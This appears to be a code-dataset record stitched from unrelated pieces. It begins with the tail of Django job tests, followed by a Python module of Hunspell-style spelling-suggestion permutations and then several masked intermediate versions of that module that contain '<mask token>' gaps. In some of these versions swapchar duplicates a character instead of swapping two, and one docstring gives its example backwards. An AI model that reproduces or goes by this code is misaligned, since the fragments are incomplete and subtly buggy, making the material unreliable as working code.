id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\",\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_pass\"\n name = \"TestReadOnlyPass\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_fail\"\n name = \"TestReadOnlyFail\"\n job_class = get_job(f\"local/{module}/{name}\")\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted\n # Also ensure the standard log message about aborting the transaction is *not* present\n self.assertNotEqual(\n job_result.data[\"run\"][\"log\"][-1][-1], \"Database changes have been reverted due to error.\"\n )\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with 
self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_no_commit_field\"\n name = \"TestReadOnlyNoCommitField\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n form = job_class().as_form()\n\n self.assertHTMLEqual(\n form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\",\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_ipaddress_vars\"\n name = \"TestIPAddresses\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n # Fill out the form\n form_data = dict(\n ipv4_address=\"1.2.3.4\",\n ipv4_with_mask=\"1.2.3.4/32\",\n ipv4_network=\"1.2.3.0/24\",\n ipv6_address=\"2001:db8::1\",\n ipv6_with_mask=\"2001:db8::1/64\",\n ipv6_network=\"2001:db8::/64\",\n )\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n\n # Prepare the job data\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n data = job_class.serialize_data(form.cleaned_data)\n\n # Run the job and extract the job payload data\n run_job(data=data, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data[\"run\"][\"log\"][0][2] # Indexing makes me sad.\n job_result_data = json.loads(job_payload)\n\n # Assert stuff\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n 
self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b\"I am content.\\n\"\n cls.dummy_file = SimpleUploadedFile(name=\"dummy.txt\", content=cls.file_contents)\n cls.job_content_type = ContentType.objects.get(app_label=\"extras\", model=\"job\")\n\n def setUp(self):\n self.dummy_file.seek(0) # Reset cursor so we can read it again.\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n job_name = \"local/test_file_upload_pass/TestFileUploadPass\"\n job_class = get_job(job_name)\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n # Serialize the file to FileProxy\n data = {\"file\": self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n\n # Assert that the file was serialized to a FileProxy\n self.assertTrue(isinstance(serialized_data[\"file\"], uuid.UUID))\n self.assertEqual(serialized_data[\"file\"], FileProxy.objects.latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n\n # Run the job\n run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n\n # Assert that file contents were correctly read\n self.assertEqual(\n job_result.data[\"run\"][\"log\"][0][2], f\"File contents: {self.file_contents}\" # \"File contents: ...\"\n )\n\n # Assert that FileProxy was cleaned up\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, 
\"extras/tests/dummy_jobs\")):\n job_name = \"local/test_file_upload_fail/TestFileUploadFail\"\n job_class = get_job(job_name)\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n # Serialize the file to FileProxy\n data = {\"file\": self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n\n # Assert that the file was serialized to a FileProxy\n self.assertTrue(isinstance(serialized_data[\"file\"], uuid.UUID))\n self.assertEqual(serialized_data[\"file\"], FileProxy.objects.latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n\n # Run the job\n run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n\n # Assert that file contents were correctly read\n self.assertEqual(\n job_result.data[\"run\"][\"log\"][0][2], f\"File contents: {self.file_contents}\" # \"File contents: ...\"\n )\n # Also ensure the standard log message about aborting the transaction is present\n self.assertEqual(job_result.data[\"run\"][\"log\"][-1][-1], \"Database changes have been reverted due to error.\")\n\n # Assert that FileProxy was cleaned up\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-ids": [
10,
15,
16,
17,
20
]
}
|
[
10,
15,
16,
17,
20
] |
"""
Note: names of methods in this module, if seem weird, are the same as in Hunspell's ``suggest.cxx``
to keep track of them.
"""
from typing import Iterator, Union, List, Set
from spylls.hunspell.data import aff
# Maximum character distance used by the long-range permutations
# (longswapchar, movechar); same limit as in Hunspell's suggest.cxx.
MAX_CHAR_DISTANCE = 4
def replchars(word: str, reptable: List[aff.RepPattern]) -> Iterator[Union[str, List[str]]]:
    """
    Applies the :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings)
    to the word provided. A "_" in a pattern's replacement stands for a space, and produces
    _two_ different hypotheses: the result was one (dictionary) word "foo bar" (and should be
    checked as such), or it was the words ["foo", "bar"] and should be checked separately.
    """

    if len(word) < 2 or not reptable:
        return

    for rep in reptable:
        # TODO: compiled at aff loading
        for found in rep.regexp.finditer(word):
            candidate = (
                word[:found.start()]
                + rep.replacement.replace('_', ' ')
                + word[found.end():]
            )
            yield candidate
            if ' ' in candidate:
                yield candidate.split(' ', 2)
def mapchars(word: str, maptable: List[Set[str]]) -> Iterator[str]:
    """
    Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table (sets of potentially similar
    chars) and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and
    we have a misspelling "anarchia", ``mapchars`` will do this:

    >>> [*pmt.mapchars("anarchia", ['aáã'])]
    ['ánarchia',
     'ánárchia',
     'ánárchiá',
     'ánárchiã',
     'ánãrchia',
     'ánãrchiá',
     'ánãrchiã',
     'ãnarchia',
     'ãnárchia',
     'ãnárchiá',
     'ãnárchiã',
     'ãnãrchia',
     'ãnãrchiá',
     'ãnãrchiã']
    """

    if len(word) < 2 or not maptable:
        return

    def substitute_from(current, start=0):
        # Recursively replace the first occurrence (at or after `start`) of any
        # mapped sequence, then continue past it in the substituted string.
        if start >= len(current):
            return
        for group in maptable:
            for sequence in group:
                pos = current.find(sequence, start)
                if pos == -1:
                    continue
                for replacement in group:
                    if replacement == sequence:
                        continue
                    candidate = current[:pos] + replacement + current[pos + len(sequence):]
                    yield candidate
                    yield from substitute_from(candidate, pos + 1)

    yield from substitute_from(word)
def swapchar(word: str) -> Iterator[str]:
    """
    Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces
    also doubleswaps: ahev -> have.
    """

    if len(word) < 2:
        return

    for i in range(0, len(word) - 1):
        # Swap the chars at positions i and i+1.
        # (Fixed: the original yielded word[i+1] twice — duplicating the second
        # char instead of swapping, so "ahev" produced "hhev", never "haev".)
        yield word[:i] + word[i+1] + word[i] + word[i+2:]

    # try double swaps for short words
    # ahev -> have, owudl -> would
    if len(word) in [4, 5]:
        yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1] + word[-2]
        if len(word) == 5:
            yield word[0] + word[2] + word[1] + word[-1] + word[-2]
def longswapchar(word: str) -> Iterator[str]:
    """
    Produces permutations with non-adjacent chars swapped (up to 4 chars distance)
    """

    last = len(word)
    for left in range(0, last - 2):
        for right in range(left + 2, min(left + MAX_CHAR_DISTANCE, last)):
            yield (word[:left] + word[right] +
                   word[left+1:right] + word[left] + word[right+1:])
def badcharkey(word: str, layout: str) -> Iterator[str]:
    """
    Produces permutations with chars replaced by adjacent chars on keyboard layout ("vat -> cat")
    or downcased (if it was accidental uppercase).

    Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`
    """

    for idx, char in enumerate(word):
        prefix = word[:idx]
        suffix = word[idx+1:]

        upper = char.upper()
        if char != upper:
            yield prefix + upper + suffix

        if not layout:
            continue

        # '|' separates keyboard rows in KEY; chars across it are not neighbors.
        pos = layout.find(char)
        while pos != -1:
            if pos > 0 and layout[pos-1] != '|':
                yield prefix + layout[pos-1] + suffix
            if pos + 1 < len(layout) and layout[pos+1] != '|':
                yield prefix + layout[pos+1] + suffix
            pos = layout.find(char, pos + 1)
def extrachar(word: str) -> Iterator[str]:
    """
    Produces permutations with one char removed in all possible positions
    """
    if len(word) < 2:
        return

    for idx, _ in enumerate(word):
        yield word[:idx] + word[idx+1:]
def forgotchar(word: str, trystring: str) -> Iterator[str]:
    """
    Produces permutations with one char inserted in all possible possitions.

    List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,
    doesn't try anything! Chars there are expected to be sorted in order of chars usage in language
    (most used characters first).
    """

    if not trystring:
        return

    positions = range(0, len(word))
    for char in trystring:
        for pos in positions:
            yield word[:pos] + char + word[pos:]
def movechar(word: str) -> Iterator[str]:
    """
    Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,
    because it is already handled by :meth:`swapchar`)
    """

    if len(word) < 2:
        return

    # Move a character forward by at least 2 positions.
    for src, char in enumerate(word):
        for dst in range(src + 3, min(len(word), src + MAX_CHAR_DISTANCE + 1)):
            yield word[:src] + word[src+1:dst] + char + word[dst:]

    # Move a character backward by at least 2 positions.
    for src in reversed(range(0, len(word))):
        for dst in reversed(range(max(0, src - MAX_CHAR_DISTANCE + 1), src - 1)):
            yield word[:dst] + word[src] + word[dst:src] + word[src+1:]
def badchar(word: str, trystring: str) -> Iterator[str]:
    """
    Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`
    set.
    """

    if not trystring:
        return

    for candidate in trystring:
        for pos in reversed(range(0, len(word))):
            if word[pos] != candidate:
                yield word[:pos] + candidate + word[pos+1:]
def doubletwochars(word: str) -> Iterator[str]:
    """
    Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)
    """
    if len(word) < 5:
        return

    # TODO: 1) for vacacation yields "vacation" twice, hunspell's algo kinda wiser
    #       2) maybe just use regexp?..
    for pos in range(2, len(word)):
        if word[pos] == word[pos-2] and word[pos-1] == word[pos-3]:
            yield word[:pos-1] + word[pos+1:]
def twowords(word: str) -> Iterator[List[str]]:
    """
    Produces permutation of splitting in two words in all possible positions.
    """
    for split_at in range(1, len(word)):
        yield [word[:split_at], word[split_at:]]
|
normal
|
{
"blob_id": "cfba55505f3290a14b98d594bc871a74812c7c57",
"index": 5594,
"step-1": "<mask token>\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. 
E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\n<mask token>\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\n<mask token>\n\n\ndef badchar(word: str, trystring: str) 
->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\n<mask token>\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-2": "<mask token>\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. 
E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\n<mask token>\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\n<mask token>\n\n\ndef forgotchar(word: str, trystring: str) 
->Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n if len(word) < 2:\n return\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos +\n MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos + 1:topos] + char + word[topos:\n ]\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1),\n frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[\n frompos + 1:]\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\ndef doubletwochars(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n if len(word) < 5:\n return\n for i in range(2, len(word)):\n if word[i - 2] == word[i] and word[i - 3] == word[i - 1]:\n yield word[:i - 1] + word[i + 1:]\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-3": "<mask token>\nMAX_CHAR_DISTANCE = 4\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. 
E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\ndef swapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces\n also doubleswaps: ahev -> have.\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word) - 1):\n yield word[:i] + word[i + 1] + word[i + 1] + word[i + 2:]\n if len(word) in [4, 5]:\n yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1\n ] + word[-2]\n if len(word) == 5:\n yield word[0] + word[2] + word[1] + word[-1] + word[-2]\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY 
<spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\ndef extrachar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char removed in all possible positions\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word)):\n yield word[:i] + word[i + 1:]\n\n\ndef forgotchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n if len(word) < 2:\n return\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos +\n MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos + 1:topos] + char + word[topos:\n ]\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1),\n frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[\n frompos + 1:]\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY 
<spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\ndef doubletwochars(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n if len(word) < 5:\n return\n for i in range(2, len(word)):\n if word[i - 2] == word[i] and word[i - 3] == word[i - 1]:\n yield word[:i - 1] + word[i + 1:]\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-4": "<mask token>\nfrom typing import Iterator, Union, List, Set\nfrom spylls.hunspell.data import aff\nMAX_CHAR_DISTANCE = 4\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. 
E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\ndef swapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces\n also doubleswaps: ahev -> have.\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word) - 1):\n yield word[:i] + word[i + 1] + word[i + 1] + word[i + 2:]\n if len(word) in [4, 5]:\n yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1\n ] + word[-2]\n if len(word) == 5:\n yield word[0] + word[2] + word[1] + word[-1] + word[-2]\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, 